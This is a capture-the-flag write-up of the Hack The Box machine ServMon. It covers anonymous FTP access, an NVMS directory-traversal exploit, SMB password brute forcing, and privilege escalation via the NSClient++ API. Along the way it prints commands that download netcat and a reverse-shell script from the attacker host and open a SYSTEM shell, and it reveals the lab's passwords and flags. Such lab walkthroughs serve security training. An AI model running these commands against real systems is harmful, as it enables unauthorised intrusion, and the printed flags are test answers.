Writeups

Hack The Box Writeup: Servmon

ServMon is an Easy Microsoft Windows box good for 20 points. The slogan Monitoring is not protection really lives up to its name. Let’s do this!

Hack The Box Servmon_

[0x1] Reconnaissance & Enumeration

Step 1 is to perform a port and service scan for the machine. Since it is a Microsoft Windows machine, quite a few RPC ports are visible, but also some other known ports.

nmap -sC -sV -p- -T5 -oA servmon-allports 10.10.10.184

# Nmap 7.80 scan initiated Sun Apr 12 19:07:33 2020 as: nmap -sC -sV -p- -T5 -oA servmon-allports 10.10.10.184
Nmap scan report for 10.10.10.184
Host is up (0.024s latency).
Not shown: 65516 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
5666/tcp open tcpwrapped
6063/tcp open x11?
6699/tcp open napster?
7680/tcp open pando-pub?
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC

Host script results:
|_clock-skew: 24s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-12T18:11:32
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 12 19:11:29 2020 -- 1 IP address (1 host up) scanned in 236.52 seconds

Uit de poortscan komt een actieve tcp/21 poort naar voren die volgens de nap scan een FTP-service biedt met anonymous access. Dit is een goed startpunt om op onderzoek uit te gaan.

[0x2] Initial Access

Logging in as anonymous works and I have access through FTP.

ftp open 10.10.10.184

Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:user): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

The FTP service provides access to two folders of two so-called employees.

ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:05PM <DIR> Users
226 Transfer complete.

ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:06PM <DIR> Nadine
01-18-20 12:08PM <DIR> Nathan

Nadine’s folder contains a file called Confidential.txt which sounds like an interesting file to download. I use the get command to download the file to my local machine.

ftp> cd Nadine
250 CWD command successful.

ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:08PM 174 Confidential.txt
226 Transfer complete.

get confidential.txt
local: confidential.txt remote: confidential.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
174 bytes received in 0.11 secs (1.5681 kB/s)

There is a to-do list in Nathan’s folder. Often new hints can be found here that can help in the further search for the root flag. I will also download this file to view later.

ftp> cd Nathan
250 CWD command successful.

ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:10PM 186 Notes to do.txt
226 Transfer complete.

The confidential.txt file indicates that a password.txt file exists in Nathan’s Desktop folder and refers to a “Secure folder”.

cat confidential.txt

Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

The todo.txt file gives some interesting hints to the rest . Apparently an application NVMS is running that is still accessible to everyone and the password needs to be changed.

cat Notes\ to\ do.txt

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

NVMS found at http://10.10.10.184

The NVMS appears to contain a Directory Traversal vulnerability and I download the Python exploit via ExploitDB. It allows me to download the Passwords.txt file from Nathan’s desktop and save it locally.

python exploit.py http://10.10.10.184/Pages users/Nathan/Desktop/Passwords.txt Passwords.txt

Directory Traversal Succeeded
Saving Output

Not 1 but 6 passwords. They may not all work, or they may all have a different function.

cat Passwords.txt

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me

I use the Metasploit scanner smb_login to check, based on the password file, whether I can log in via SMB with the username “ nathan ”. The nmap scan revealed that port 445 is open for SMB.

msf5 > use auxiliary/scanner/smb/smb_login

msf5 auxiliary(scanner/smb/smb_login) > set pass_file Passwords.txt
pass_file => Passwords.txt

msf5 auxiliary(scanner/smb/smb_login) > set smbuser nathan
smbuser => nathan

msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.184
rhosts => 10.10.10.184

msf5 auxiliary(scanner/smb/smb_login) > run

No hit is found while brute forcing the SMB login for Nathan. The passwords do not apply to this account.

[*] 10.10.10.184:445 - 10.10.10.184:445 - Starting SMB login bruteforce
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:1nsp3ctTh3Way2Mars!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:Th3r34r3To0M4nyTrait0r5!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:B3WithM30r4ga1n5tMe',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:L1k3B1gBut7s@W0rk',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:0nly7h3y0unGWi11F0l10w',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:IfH3s4b0Utg0t0H1sH0me',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:Gr4etN3w5w17hMySk1Pa5$',
[*] 10.10.10.184:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Again an SMB brute force but with Nadine’s account. During this run there will be a hit, namely: L1k3B1gBut7s @ W0rk .

msf5 auxiliary(scanner/smb/smb_login) > set smbuser nadine
smbuser => nadine
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.184:445 - 10.10.10.184:445 - Starting SMB login bruteforce
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nadine:1nsp3ctTh3Way2Mars!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nadine:Th3r34r3To0M4nyTrait0r5!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nadine:B3WithM30r4ga1n5tMe',
[+] 10.10.10.184:445 - 10.10.10.184:445 - Success: '.\nadine:L1k3B1gBut7s@W0rk'
[*] 10.10.10.184:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[0x3] Path to User flag

I use the credentials found to try to log in via SSH. This service emerged from the nmap scan. In this case it is a successful login and I can look for new information.

ssh nadine@10.10.10.184
nadine@10.10.10.184's password:

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

Once connected to the server, I check if there is a user flag in Nadine’s profile. The user.txt is on her desktop .

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020 22:28 <DIR> .
08/04/2020 22:28 <DIR> ..
18/04/2020 11:57 34 user.txt
               1 File(s) 34 bytes
               2 Dir(s) 27,417,485,312 bytes free

Nadine’s account has read rights to the file and with this the user flag has arrived!

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
ec99b381bef3129dfa5824cef82b1c6c

[0x4] Path to Root flag

While looking around in C: \ Program Files \ I come across an NSClient ++ folder. The previously found to-do list indicated that security was applied to this. While looking around nsclient.ini I find a password and after some searching on ExploitDB I find a known vulnerability in this version of the monitoring agent NSClient.

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
´╗┐# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help

; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1

[......clip.....]

From the output of the nmap scan it is visible that there is another website running on port 8443.

I create a temporary folder on the machine that I can delete later. With this I don’t get in the way of other people. From my own machine I offer netcat.exe and a script for setting up the reverse connection.

nadine@SERVMOND C:\ mkdir sys

nadine@SERVMON C:\sys>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\sys>
PS C:\sys> Invoke-WebRequest -Uri "http://10.10.14.40:8080/nc.exe" -OutFile "C:\sys\nc.exe"
PS C:\sys> Invoke-WebRequest -Uri "http://10.10.14.40:8081/nc_script.bat" -OutFile "C:\sys\nc_script.bat"

The first step of the exploit is to upload my custom script with reverse connection. By means of the API it is possible to upload your own bat file to the central scripts folder on the same server. I got the password for the admin user from the nsclient ++ and it comes in handy.

nadine@SERVMON C:\sys>curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/nc_script.bat --data-binary
 @nc_script.bat
Enter host password for user 'admin':
Added nc_script as scripts\nc_script.bat

Before I run the script I start a Netcat Listener on my own machine on port 1337.

rlwrap netcat -lvnp 1337
listening on [any] 1337 ...

The second step of the exploit is to actually execute the script that I previously uploaded. Again, I use the same password.

nadine@SERVMON C:\sys>curl -s -k -u admin "https://localhost:8443/api/v1/queries/nc_script/commands/execute"
Enter host password for user 'admin':

The script is called and executed through the API. Immediately after this I see the reverse connection coming in on my listener. Because the NSclient service runs as SYSTEM users, the shell is started under this user.

connect to [10.10.14.40] from (UNKNOWN) [10.10.10.184] 49882
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
nt authority\system

C:\Program Files\NSClient++>hostname
ServMon

In the Desktop directory of the Administrator is the root.txt and this seems to have destroyed the machine.

C:\Program Files\NSClient++>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop
c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C
 Directory of c:\Users\Administrator\Desktop
08/04/2020 23:12 <DIR> .
08/04/2020 23:12 <DIR> ..
19/04/2020 07:41 34 root.txt
               1 File(s) 34 bytes
               2 Dir(s) 27,422,359,552 bytes free

Last step, displaying the root flag and marking the ServMon on Hack The Box as rooted. Gotcha!

c:\Users\Administrator\Desktop>type root.txt
type root.txt
1fb45c5963b0af52703933b40e68c728



Tags

d0p4m1n3

Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
%d bloggers like this: